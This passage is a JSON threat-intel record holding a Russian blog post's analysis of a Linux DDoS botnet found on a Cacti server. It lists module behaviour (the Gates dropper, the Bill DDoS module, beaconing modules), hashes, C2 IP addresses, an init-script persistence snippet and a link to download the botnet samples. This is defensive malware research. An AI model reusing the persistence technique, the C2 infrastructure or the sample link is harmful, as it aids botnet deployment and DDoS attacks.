/usr/share/cacti/include/layout.js\r\n.M....... /usr/share/cacti/include/main.css\r\n.M....... /usr/share/cacti/include/plugins.php\r\n.M....... /usr/share/cacti/include/top_graph_header.php\r\n.M....... /usr/share/cacti/include/top_header.php\r\n.M....... /usr/share/cacti/include/treeview\r\n.M....... /usr/share/cacti/include/treeview/ftiens4.js\r\n.M....... /usr/share/cacti/include/treeview/ftiens4_export.js\r\n.M....... /usr/share/cacti/include/treeview/ftv2blank.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2lastnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2mlastnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2mnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2node.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2plastnode.gif\r\nhttps://habrahabr.ru/post/213973/\r\nPage 12 of 24\n\n.M....... /usr/share/cacti/include/treeview/ftv2pnode.gif\r\n.M....... /usr/share/cacti/include/treeview/ftv2vertline.gif\r\n.M....... /usr/share/cacti/include/treeview/ua.js\r\n.M....... /usr/share/cacti/include/zoom.js\r\n.M....... /usr/share/cacti/index.php\r\n.M....... /usr/share/cacti/install\r\n.M....... /usr/share/cacti/install/0_8_1_to_0_8_2.php\r\n.M....... /usr/share/cacti/install/0_8_2_to_0_8_2a.php\r\n.M....... /usr/share/cacti/install/0_8_2a_to_0_8_3.php\r\n.M....... /usr/share/cacti/install/0_8_3_to_0_8_4.php\r\n.M....... /usr/share/cacti/install/0_8_4_to_0_8_5.php\r\n.M....... /usr/share/cacti/install/0_8_5a_to_0_8_6.php\r\n.M....... /usr/share/cacti/install/0_8_6_to_0_8_6a.php\r\n.M....... /usr/share/cacti/install/0_8_6c_to_0_8_6d.php\r\n.M....... /usr/share/cacti/install/0_8_6d_to_0_8_6e.php\r\n.M....... /usr/share/cacti/install/0_8_6f_to_0_8_6g.php\r\n.M....... /usr/share/cacti/install/0_8_6g_to_0_8_6h.php\r\n.M....... /usr/share/cacti/install/0_8_6h_to_0_8_6i.php\r\n.M....... /usr/share/cacti/install/0_8_6j_to_0_8_7.php\r\n.M....... /usr/share/cacti/install/0_8_7_to_0_8_7a.php\r\n.M....... /usr/share/cacti/install/0_8_7a_to_0_8_7b.php\r\n.M....... /usr/share/cacti/install/0_8_7b_to_0_8_7c.php\r\n.M....... /usr/share/cacti/install/0_8_7c_to_0_8_7d.php\r\n.M....... /usr/share/cacti/install/0_8_7d_to_0_8_7e.php\r\n.M....... /usr/share/cacti/install/0_8_7e_to_0_8_7f.php\r\n.M....... /usr/share/cacti/install/0_8_7f_to_0_8_7g.php\r\n.M....... /usr/share/cacti/install/0_8_7g_to_0_8_7h.php\r\n.M....... /usr/share/cacti/install/0_8_7h_to_0_8_7i.php\r\n.M....... /usr/share/cacti/install/0_8_7i_to_0_8_8.php\r\n.M....... /usr/share/cacti/install/0_8_8_to_0_8_8a.php\r\n.M....... /usr/share/cacti/install/0_8_to_0_8_1.php\r\n.M....... /usr/share/cacti/install/index.php\r\n.M....... /usr/share/cacti/install/install_finish.gif\r\n.M....... /usr/share/cacti/install/install_next.gif\r\n.M....... /usr/share/cacti/lib\r\n.M....... /usr/share/cacti/lib/adodb\r\n.M....... /usr/share/cacti/lib/adodb/adodb-csvlib.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-datadict.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-error.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-errorhandler.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-errorpear.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-exceptions.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-iterator.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-lib.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-pear.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-perf.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-php4.inc.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 13 of 24\n\n.M....... /usr/share/cacti/lib/adodb/adodb-time.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb-xmlschema.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/adodb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-db2.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-firebird.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-generic.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-informix.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-mysql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-oci8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-postgres.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-sapdb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/datadict/datadict-sybase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado5.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado_access.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ado_mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-borland_ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-csv.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-db2.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-fbsql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-firebird.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ibase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-informix.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-informix72.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-ldap.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mssqlpo.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysqli.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-mysqlt.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-netezza.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci805.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oci8po.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc_mssql.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbc_oracle.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbtp.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-odbtp_unicode.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-oracle.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-pdo.inc.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 14 of 24\n\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres64.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-postgres7.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-proxy.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sapdb.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlanywhere.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlite.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sqlitepo.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-sybase.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/drivers/adodb-vfp.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ar.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-bg.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-bgutf8.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ca.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-cn.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-cz.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-de.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-en.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-es.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-fr.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-hu.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-it.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-nl.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-pl.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-pt-br.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ro.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-ru1251.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/lang/adodb-sv.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/license.txt\r\n.M....... /usr/share/cacti/lib/adodb/toexport.inc.php\r\n.M....... /usr/share/cacti/lib/adodb/tohtml.inc.php\r\n.M....... /usr/share/cacti/lib/api_automation_tools.php\r\n.M....... /usr/share/cacti/lib/api_data_source.php\r\n.M....... /usr/share/cacti/lib/api_device.php\r\n.M....... /usr/share/cacti/lib/api_graph.php\r\n.M....... /usr/share/cacti/lib/api_poller.php\r\n.M....... /usr/share/cacti/lib/api_tree.php\r\n.M....... /usr/share/cacti/lib/auth.php\r\n.M....... /usr/share/cacti/lib/cdef.php\r\n.M....... /usr/share/cacti/lib/data_query.php\r\n.M....... /usr/share/cacti/lib/database.php\r\n.M....... /usr/share/cacti/lib/export.php\r\n.M....... /usr/share/cacti/lib/functions.php\r\n.M....... /usr/share/cacti/lib/graph_export.php\r\n.M....... /usr/share/cacti/lib/graph_variables.php\r\n.M....... /usr/share/cacti/lib/html.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 15 of 24\n\n.M....... /usr/share/cacti/lib/html_form.php\r\n.M....... /usr/share/cacti/lib/html_form_template.php\r\n.M....... /usr/share/cacti/lib/html_tree.php\r\n.M....... /usr/share/cacti/lib/html_utility.php\r\n.M....... /usr/share/cacti/lib/html_validate.php\r\n.M....... /usr/share/cacti/lib/import.php\r\n.M....... /usr/share/cacti/lib/ldap.php\r\n.M....... /usr/share/cacti/lib/ping.php\r\n.M....... /usr/share/cacti/lib/plugins.php\r\n.M....... /usr/share/cacti/lib/poller.php\r\n.M....... /usr/share/cacti/lib/rrd.php\r\n.M....... /usr/share/cacti/lib/snmp.php\r\n.M....... /usr/share/cacti/lib/sort.php\r\n.M....... /usr/share/cacti/lib/template.php\r\n.M....... /usr/share/cacti/lib/time.php\r\n.M....... /usr/share/cacti/lib/timespan_settings.php\r\n.M....... /usr/share/cacti/lib/tree.php\r\n.M....... /usr/share/cacti/lib/utility.php\r\n.M....... /usr/share/cacti/lib/variables.php\r\n.M....... /usr/share/cacti/lib/xml.php\r\n.M....... /usr/share/cacti/logout.php\r\n.M....... /usr/share/cacti/plugins\r\n.M....... /usr/share/cacti/plugins.php\r\n.M....... /usr/share/cacti/plugins/index.php\r\n.M....... /usr/share/cacti/poller.php\r\n.M....... /usr/share/cacti/poller_commands.php\r\n.M....... /usr/share/cacti/poller_export.php\r\n.M....... /usr/share/cacti/resource\r\n.M....... /usr/share/cacti/resource/script_queries\r\n.M....... /usr/share/cacti/resource/script_queries/host_cpu.xml\r\n.M....... /usr/share/cacti/resource/script_queries/host_disk.xml\r\n.M....... /usr/share/cacti/resource/script_queries/unix_disk.xml\r\n.M....... /usr/share/cacti/resource/script_server\r\n.M....... /usr/share/cacti/resource/script_server/host_cpu.xml\r\n.M....... /usr/share/cacti/resource/script_server/host_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries\r\n.M....... /usr/share/cacti/resource/snmp_queries/host_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/interface.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/kbridge.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/net-snmp_disk.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/netware_cpu.xml\r\n.M....... /usr/share/cacti/resource/snmp_queries/netware_disk.xml\r\n.M....... /usr/share/cacti/rra.php\r\n.M....... /usr/share/cacti/script_server.php\r\n.M....... /usr/share/cacti/settings.php\r\n.M....... /usr/share/cacti/templates_export.php\r\n.M....... /usr/share/cacti/templates_import.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 16 of 24\n\n.M....... /usr/share/cacti/tree.php\r\n.M....... /usr/share/cacti/user_admin.php\r\n.M....... /usr/share/cacti/utilities.php\r\n.M....... /var/lib/cacti\r\n.M....... /var/lib/cacti/cli\r\n.M....... /var/lib/cacti/cli/add_data_query.php\r\n.M....... /var/lib/cacti/cli/add_device.php\r\n.M....... /var/lib/cacti/cli/add_graph_template.php\r\n.M....... /var/lib/cacti/cli/add_graphs.php\r\n.M....... /var/lib/cacti/cli/add_perms.php\r\n.M....... /var/lib/cacti/cli/add_tree.php\r\n.M....... /var/lib/cacti/cli/analyze_database.php\r\n.M....... /var/lib/cacti/cli/convert_innodb.php\r\n.M....... /var/lib/cacti/cli/copy_user.php\r\n.M....... /var/lib/cacti/cli/data_template_associate_rra.php\r\n.M....... /var/lib/cacti/cli/host_update_template.php\r\n.M....... /var/lib/cacti/cli/import_template.php\r\n.M....... /var/lib/cacti/cli/poller_data_sources_reapply_names.php\r\n.M....... /var/lib/cacti/cli/poller_graphs_reapply_names.php\r\n.M....... /var/lib/cacti/cli/poller_output_empty.php\r\n.M....... /var/lib/cacti/cli/poller_reindex_hosts.php\r\n.M....... /var/lib/cacti/cli/rebuild_poller_cache.php\r\n.M....... /var/lib/cacti/cli/reorder_data_query.php\r\n.M....... /var/lib/cacti/cli/repair_database.php\r\n.M....... /var/lib/cacti/cli/repair_templates.php\r\n.M....... /var/lib/cacti/cli/structure_rra_paths.php\r\n.M....... /var/lib/cacti/cli/upgrade_database.php\r\n.M....... /var/lib/cacti/rra\r\n.M....... /var/lib/cacti/scripts\r\n.M....... /var/lib/cacti/scripts/3com_cable_modem.pl\r\n.M....... /var/lib/cacti/scripts/diskfree.pl\r\n.M....... /var/lib/cacti/scripts/diskfree.sh\r\n.M....... /var/lib/cacti/scripts/linux_memory.pl\r\n.M....... /var/lib/cacti/scripts/loadavg.pl\r\n.M....... /var/lib/cacti/scripts/loadavg_multi.pl\r\n.M....... /var/lib/cacti/scripts/ping.pl\r\n.M....... /var/lib/cacti/scripts/query_host_cpu.php\r\n.M....... /var/lib/cacti/scripts/query_host_partitions.php\r\n.M....... /var/lib/cacti/scripts/query_unix_partitions.pl\r\n.M....... /var/lib/cacti/scripts/sql.php\r\n.M....... /var/lib/cacti/scripts/ss_fping.php\r\n.M....... /var/lib/cacti/scripts/ss_host_cpu.php\r\n.M....... /var/lib/cacti/scripts/ss_host_disk.php\r\n.M....... /var/lib/cacti/scripts/ss_sql.php\r\n.M....... /var/lib/cacti/scripts/unix_processes.pl\r\n.M....... /var/lib/cacti/scripts/unix_tcp_connections.pl\r\n.M....... /var/lib/cacti/scripts/unix_users.pl\r\nhttps://habrahabr.ru/post/213973/\r\nPage 17 of 24\n\n.M....... /var/lib/cacti/scripts/weatherbug.pl\r\n.M....... /var/lib/cacti/scripts/webhits.pl\r\nS.5....T. /var/log/cacti/cacti.log\r\nS.5....T. c /etc/ntop.conf\r\n.......T. c /etc/avahi/hosts\r\nS.5....T. c /etc/netatalk/AppleVolumes.default\r\nS.5....T. c /etc/netatalk/afpd.conf\r\nS.5....T. c /etc/netatalk/netatalk.conf\r\nS.5....T. c /etc/httpd/conf.d/nagios.conf\r\nS.5....T. c /etc/nagios/nagios.cfg\r\nS.5....T. c /etc/nagios/objects/commands.cfg\r\nS.5....T. c /etc/nagios/objects/localhost.cfg\r\nS.5....T. c /etc/sysconfig/ntpd\r\nS.5....T. c /etc/profile\r\nSM5..UGT. c /etc/snmp/snmpd.conf\r\nS.5....T. c /etc/sysconfig/iptables-config\r\n.......T. c /etc/avahi/avahi-dnsconfd.action\r\nS.5....T. c /etc/dnsmasq.conf\r\nЭто означает, что никакие системные файлы не были изменены. Т.к. процессы в системе не были скрыты, я\r\nпредположил, что никаких руткитов здесь не использовалось и можно с некоторой уверенностью сказать,\r\nчто система чиста.\r\nПоиск информации о ботнете\r\nПервым делом я начал искать какую-то информацию об этом ботнете, ища по имени домена, имени файлов\r\nи строкам из crontab.\r\nНекоторая информация сразу же нашлась:\r\nMy home PC has been 0wn3d :( @ forums.debian.net\r\nWhat do sapd, skysapd, sksapd, and ksapd do? @ askubuntu.com\r\nI Got Myself Hacked @ hackervisions.org\r\nSuspected rootkit @ archlinuxarm.org\r\nВ целом, ничего интересного или нового.\r\nИсследование файлов ботнета\r\nПервым делом, я воспользовался программой file, чтобы узнать побольше об этим исполняемых файлах:\r\natddd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\ncupsdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\ncupsddh: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped\r\nksapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nkysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nhttps://habrahabr.ru/post/213973/\r\nPage 18 of 24\n\nskysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nxfsdxd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not\r\nNot stripped! Вот так новость!\r\nМне почему-то понравился файл cupsdd, и я первым делом загрузил его, а не atddd. Сам не знаю почему, но\r\nэто было совершенно правильно.\r\nGates\r\nИтак, cupsdd — модуль «Gates». md5 603170ad361f6e098c8681ed264155eb, sha1\r\n1714fd31cc931e2a0eb97d25a076567af45dc6d8\r\nЧто же он делает, и почему он «Gates»? Ну, на это нам ответит IDA Pro, например.\r\nЧто же делает этот модуль?\r\nПытается инициализировать себя\r\nРаспаковывает RSA-данные, в моем случае это была строка:\r\nhttps://habrahabr.ru/post/213973/\r\nPage 19 of 24\n\n116.10.189.246:30000:1:1:h:578856:579372:579888\r\nПеременные из которой назначаются следующим образом:\r\ng_strConnTgt=116.10.189.246\r\ng_iGatsPort=30000\r\ng_iGatsIsFx=1\r\ng_iIsService=1\r\ng_strBillTail=h\r\ng_strCryptStart=578856\r\ng_strDStart=579372\r\ng_strNStart=579888\r\nПоследние три параметра нужны для определения трех RSA-строк в случае обновления модулей.\r\nСкрытый текст\r\nПытается установить модуль «Bill»\r\nПроверяет, не запущен ли уже он, путем бинда порта 10808. Если удалось забиндить — не запущен. Если\r\nнет, то убиваем процесс, PID которого хранится в lock-файле в /tmp/bill.lock\r\nНаходит путь, где хранится текущий exe, путем чтения /proc/%d/exe, выделяет путь, добавляет 'BillTail',\r\nрасшифрованного из пункта 1 (в моем случае был 'h'), открывает его на запись и записывает туда файл,\r\nначиная со смещения 0xB1728 размером 335872.\r\nФоркается и запускает новый файл.\r\nСкрытый текст\r\nhttps://habrahabr.ru/post/213973/\r\nPage 20 of 24\n\nВызывает функцию daemon(), которая ребиндит текущие stdin, stdout и stderr на /dev/null\r\nПроверяет, запущен ли он сам (модуль «Gates») путем проверки файла /tmp/gates.lock. Если\r\nзапущен, то Gates завершается.\r\nДобавляет распакованный модуль «Bill» в автозагрузку sysvinit путем создания наипростейшего init-скрипта в /etc/init.d/ c названием «DbSecuritySpt» вида:\r\n#!/bin/bash\r\n/path/to/bill\r\nИ создает симлинки в /etc/rc[1-5].d/97DbSecuritySpt на него.\r\nСкрытый текст\r\nhttps://habrahabr.ru/post/213973/\r\nPage 21 of 24\n\nЗапускается функция MainProcess()\r\nЧитает основную информацию о системе, процессоре, оперативной памяти, сетевых картах, винчестерах.\r\nСкрытый текст\r\nBill\r\nМодуль «Bill» — DDoS модуль. Запакован UPX. В моем случае назывался \"cupsddh\", md5\r\n7fb3dce23d290166c7e52644b16faae6, sha1 98db5a311118c78d97aa514db7d8277535544926\r\nhttps://habrahabr.ru/post/213973/\r\nPage 22 of 24\n\nУмеет атаковать хосты по TCP, UDP, ICMP и методом DNS-амплификации. Умеет ограничивать себя\r\nв ресурсах CPU, переконфигурироваться на лету, самообновляться.\r\nЧитает основную информацию о системе, процессоре, оперативной памяти, сетевых картах,\r\nвинчестерах.\r\nЧитает информацию о DNS.\r\nДелает system(«insmod /usr/lib/xpacket.ko»)\r\nПри самообновлении пишет себя в /usr/lib/libamplify.so\r\nНачинает слушать 127.0.0.1:10808. Может получать как конфиг от главного модуля, так и команды на\r\nатаку.\r\n«Стучащий» модуль\r\nФайл ksapdd — какой-то модуль, который отправляет статистику и информацию на главные сервера.\r\nСервер и порт зашиты в программу. В моем случае, это были 121.12.110.96:10991, которые элементарно\r\nдекодируются:\r\nСкрытый текст\r\nФайлы kysapdd, skysapdd, xfsdxd и atddd являются копиями ksapdd, но первый подключается к\r\n112.90.252.76:10991, второй к 112.90.22.197:10991, третий к 116.10.189.246:10991, а четвертый — к\r\n202.103.178.76:10991\r\nЗаключение\r\nНу вот и все. Получилось несколько поверхностно, но управляющие серверы в упор не хотят отдавать\r\nкоманды моим экземплярам, и ничего не происходит. Берегите свои серверы.\r\nhttps://habrahabr.ru/post/213973/\r\nPage 23 of 24\n\nrghost.ru/52680741 — здесь все файлы ботнета.\r\nSource: https://habrahabr.ru/post/213973/\r\nhttps://habrahabr.ru/post/213973/\r\nPage 24 of 24\n\nBill Модуль «Bill» — DDoS модуль. Запакован UPX. В моем случае назывался \"cupsddh\", md5\n7fb3dce23d290166c7e52644b16faae6, sha1 98db5a311118c78d97aa514db7d8277535544926 \n   Page 22 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://habrahabr.ru/post/213973/"
	],
	"report_names": [
		"213973"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775438992,
	"ts_updated_at": 1775826735,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.pdf",
		"text": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.txt",
		"img": "https://archive.orkl.eu/b40690b5aa64a997e15007ad8094a99cc8d1c1dd.jpg"
	}
}